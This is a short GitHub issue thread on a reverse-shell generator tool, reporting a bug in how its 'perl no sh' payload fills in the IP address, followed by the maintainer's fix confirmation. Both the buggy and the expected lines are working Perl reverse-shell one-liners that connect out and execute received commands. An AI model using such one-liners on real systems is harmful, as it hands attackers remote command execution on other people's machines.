### ISSUE TITLE
Perl payload not parsed properly

### ISSUE THREAD

**Issue by Coen-Schuijt** [0dayCTF/reverse-shell-generator#45]
When selecting the "perl no sh" payload, the IP is not parsed properly.

Result:
`perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"80:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'`

Expected result:
`perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'`

**Comment by 0dayCTF** [comment]
Thank you! Fixed
